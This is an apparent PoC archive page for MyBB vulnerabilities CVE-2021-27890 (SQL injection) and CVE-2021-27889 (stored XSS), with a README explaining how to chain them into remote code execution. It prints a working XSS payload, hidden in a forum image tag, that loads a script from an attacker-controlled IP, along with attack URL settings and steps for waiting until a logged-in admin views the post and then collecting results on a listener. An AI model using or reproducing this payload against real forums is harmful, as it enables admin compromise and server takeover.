Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-27890 PoC — MyBB SQL注入漏洞

Source
Associated Vulnerability
Title:MyBB SQL注入漏洞 (CVE-2021-27890)
Description:MyBB(MyBulletinBoard)是MyBB(MYBB)团队的开发的一套用PHP和MySQL开发的免费且基于Web的论坛软件。该软件具有简单易用、支持多国语言、可扩展等特点。 MyBB before 1.8.26 存在SQL注入漏洞,该漏洞源于通过主题XML文件中包含的主题属性。
Description
Mybb associate CVE-2021-27890 & CVE-2021-27889 to RCE poc
Readme
# Mybb-XSS_SQL_RCE-POC
Mybb associate CVE-2021-27890 & CVE-2021-27889 to RCE poc
</br>

**Before Use:**

There are two files here:  1.js and attack_listen.py

You should modify these two file:

**1.js:**

modify the mybb forum url and attack url:

```js
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py
```
</br>

**attack_listen.py**

modify the attack host and attack port:

```python
attack_host = '192.168.92.165'
attack_port = 8080
```

</br>

**Usage:**

CVE-2021-27889 is xss. You should inject the following payload in "**New Post Thread**" or "**Reply**" or "**Private Messages**" before do the attack.In this demo,I send the payload to "New Post Thread"

*notice that the **192.168.92.165** is the evil server ip,You should change it.*

```html
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]
```

![](./img/1.png)

</br>

Now Our evil js **1.js** is injected successful.Then we should wait an Admin browsed this Post with loggined admin page cookie.

*Notice that the Admin user have no necessary loggin the forum page.*

</br>

In our waiting time,We should run the "attack_listen.py" in our attack machine, To identify if the Admin user be attacked.

```shell
python3 attack_listen.py
```

</br>

When the Admin user browsed the evil post,the evil js will do the attack:

![](./img/2.png)

</br>

We can receive the information at our attack machine:

![](./img/3.png)



![](./img/4.png)
File Snapshot

[4.0K] /data/pocs/a9bf9b994bf84dbb30097b408047c04ea802e4ca ├── [5.5K] 1.js ├── [ 410] attack_listen.py ├── [4.0K] img │   ├── [ 44K] 1.png │   ├── [ 83K] 2.png │   ├── [ 41K] 3.png │   └── [ 44K] 4.png └── [1.8K] README.md 1 directory, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.